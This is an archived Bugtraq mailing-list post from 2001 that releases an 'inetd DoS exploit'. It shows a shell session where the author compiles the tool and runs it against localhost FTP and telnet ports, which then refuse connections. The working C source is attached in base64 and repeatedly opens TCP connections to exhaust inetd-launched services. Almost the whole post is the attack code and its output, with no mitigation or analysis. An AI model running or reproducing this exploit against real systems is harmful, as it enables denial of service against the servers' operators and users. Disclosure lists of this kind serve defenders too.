 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Sun, 25 Feb 2001 19:26:07 +0300 From: Serega[linux] <linux@IHGROUP.RU> To: BUGTRAQ@SECURITYFOCUS.COM Subject: inetd DoS exploit --Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD Content-Type: text/plain Content-Transfer-Encoding: 8bit Name: inetd DoS exploit Author: Serega[Linux] [ser@ihg prog]$ ./pscaner -h 127.0.0.1 /* it's my port scaner */ Open ports on [127.0.0.1] ----------------------------- [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready. [23] OPEN : [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300 ----------------------------- [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready. [ser@ihg prog]$ cc inetddos.c -o inetddos [ser@ihg prog]$ ./inetddos 127.0.0.1 21 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 21 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. login: [ser@ihg prog]$ ./inetddos 127.0.0.1 23 DoS OK [ser@ihg prog]$ telnet 127.0.0.1 23 Trying 127.0.0.1... telnet: Unable to connect to remote host: Connection refused -- /* * mailto:linux@ihgroup.ru * ICQ: 64432299 * Home Page: http://127.0.0.1 */ --Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD Content-Type: text/x-c; name="inetddos.c" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="inetddos.c" LyoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpJbmV0ZCBEb1MgZXhwbG9pdCBi WSBTZXJlZ2FbTGludXhdCklIRyBQcm9qZWN0IHd3dy5paGdyb3VwLnJ1Cm1haWx0bzpsaW51eEBp aGdyb3VwLnJ1Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KClVzYWdlOiAuL2lu ZXRkZG9zIDxob3N0PiA8cG9ydD4KCmV4YW1wbGU6Cgpbc2VyQGloZyBwcm9nXSQgLi9wc2NhbmVy IC1oIDEyNy4wLjAuMQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpPcGVuIHBvcnRzIG9u IFsxMjcuMC4wLjFdClsyMV0gT1BFTiA6IDIyMCBpaGcubG9jYWxob3N0IEZUUCBzZXJ2ZXIgKFZl cnNpb24gd3UtNi42LjYoNSkgU2F0IEZlYiAxNyAxNToxMDo0NCBNU0sgMjAwMSkgcmVhZHkuClsy M10gT1BFTiA6ClsyNV0gT1BFTiA6IDIyMCBpaGcubG9jYWxob3N0IEVTTVRQIFNlbmRtYWlsIDgu MTEuMC84LjExLjA7IFN1biwgMjUgRmViIDIwMDEgMTg6NTg6MzYgKzAzMDAKLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0KCltzZXJAaWhnIHByb2ddJCB0ZWxuZXQgMTI3LjAuMC4xIDIxClRy eWluZyAxMjcuMC4wLjEuLi4KQ29ubmVjdGVkIHRvIDEyNy4wLjAuMS4KRXNjYXBlIGNoYXJhY3Rl ciBpcyAnXl0nLgoyMjAgaWhnLmxvY2FsaG9zdCBGVFAgc2VydmVyIChWZXJzaW9uIHd1LTYuNi42 KDUpIFNhdCBGZWIgMTcgMTU6MTA6NDQgTVNLIDIwMDEpIHJlYWR5LgoKW3NlckBpaGcgcHJvZ10k IGNjIGluZXRkZG9zLmMgLW8gaW5ldGRkb3MKW3NlckBpaGcgcHJvZ10kIC4vaW5ldGRkb3MgMTI3 LjAuMC4xIDIxCkRvUyBPSwpbc2VyQGloZyBwcm9nXSQgdGVsbmV0IDEyNy4wLjAuMSAyMQpUcnlp bmcgMTI3LjAuMC4xLi4uCnRlbG5ldDogVW5hYmxlIHRvIGNvbm5lY3QgdG8gcmVtb3RlIGhvc3Q6 IENvbm5lY3Rpb24gcmVmdXNlZApbc2VyQGloZyBwcm9nXSQgdGVsbmV0IDEyNy4wLjAuMSAyMwpU cnlpbmcgMTI3LjAuMC4xLi4uCkNvbm5lY3RlZCB0byAxMjcuMC4wLjEuCkVzY2FwZSBjaGFyYWN0 ZXIgaXMgJ15dJy4KbG9naW46Cgpbc2VyQGloZyBwcm9nXSQgLi9pbmV0ZGRvcyAxMjcuMC4wLjEg MjMKRG9TIE9LCltzZXJAaWhnIHByb2ddJCB0ZWxuZXQgMTI3LjAuMC4xIDIzClRyeWluZyAxMjcu MC4wLjEuLi4KdGVsbmV0OiBVbmFibGUgdG8gY29ubmVjdCB0byByZW1vdGUgaG9zdDogQ29ubmVj dGlvbiByZWZ1c2VkCgoqLwoKCiNpbmNsdWRlIDxuZXRkYi5oPgojaW5jbHVkZSA8bmV0aW5ldC9p bi5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNs dWRlIDx0aW1lLmg+CiNpbmNsdWRlIDxzaWduYWwuaD4KCgp2b2lkIHRpbWVfb3V0KGludCBzaWcp OwppbnQgdGltZW91dD01OyAgCQpjaGFyIGxvZ29bNTEyXTsKaW50IHNvY2tmZDsKCkRvUyAoY2hh ciAqaG9zdCwgaW50IHBvcnQpCnsKdW5zaWduZWQgbG9uZyBpbnQgaXBfYWRkcjsKc3RydWN0IHNv Y2thZGRyX2luIHNlcnY7CgoKc3RydWN0IGhvc3RlbnQgKmg7CnVuc2lnbmVkIGxvbmcgaW50IHJ2 OwpzZXJ2LnNpbl9mYW1pbHkgPSBBRl9JTkVUOwppZiAoKGg9Z2V0aG9zdGJ5bmFtZShob3N0KSkg PT0gTlVMTCkKCXsKCWNsb3NlKHNvY2tmZCk7CglwZXJyb3IoaG9zdCk7CglleGl0KDEpOwoJfQoK ICAgaWYoaCE9TlVMTCkKbWVtY3B5KCZydixoLT5oX2FkZHIsaC0+aF9sZW5ndGgpOwogICBlbHNl CiAgIHJ2PWluZXRfYWRkcihob3N0KTsKc2Vydi5zaW5fYWRkci5zX2FkZHIgPSBydjsKc2Vydi5z aW5fcG9ydCA9IGh0b25zKHBvcnQpOwoKaWYgKChzb2NrZmQgPSBzb2NrZXQgKEFGX0lORVQsIFNP Q0tfU1RSRUFNLCAwKSkgPT0gLTEpCiAgICB7CiAgICBwZXJyb3IgKCJzb2NrZXQgZXJyb3IiKTsK ICAgIGV4aXQoMSk7CiAgICB9CgphbGFybSh0aW1lb3V0KTsKc2lnbmFsKFNJR0FMUk0sICh2b2lk ICopJnRpbWVfb3V0KTsKCmlmIChjb25uZWN0IChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIqKSZz ZXJ2LCBzaXplb2Yoc2VydikpICE9IDApCgl7CgljbG9zZShzb2NrZmQpOwoJcGVycm9yKGhvc3Qp OwoJZXhpdCgxKTsKCX0KCmFsYXJtKDApOwpjbG9zZShzb2NrZmQpOwpyZXR1cm4oMSk7Cn0KCgoK dm9pZCB0aW1lX291dCAoaW50IHNpZykKewoJY2xvc2Uoc29ja2ZkKTsKCXByaW50ZigidGltZW91 dFxuIik7CglleGl0KC0xKTsKfQoKCnVzYWdlKGNoYXIgKmgpCnsKcHJpbnRmKCItLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG5JbmV0ZCBEb1MgZXhwbG9pdCBiWSBTZXJlZ2FbTGlu dXhdCklIRyBQcm9qZWN0IHd3dy5paGdyb3VwLnJ1Cm1haWx0bzpsaW51eEBpaGdyb3VwLnJ1XG4t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iKTsKcHJpbnRmKCJcblVzYWdlOiAl cyA8aG9zdD4gPHBvcnQ+XG5cbiIsIGgpOwpleGl0KDEpOwp9CgoKbWFpbihpbnQgYXJnYywgY2hh ciAqKmFyZ3YpCnsKaW50IGk7CmlmIChhcmdjPDMpIHVzYWdlKGFyZ3ZbMF0pOwoKZm9yIChpPTE7 IGk8MTAwMDsgaSsrKQpEb1MoYXJndlsxXSwgYXRvaShhcmd2WzJdKSk7CnByaW50ZigiRG9TIGZh aWxlZFxuIik7Cgp9 --Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD--
| |||||||||||||||||||||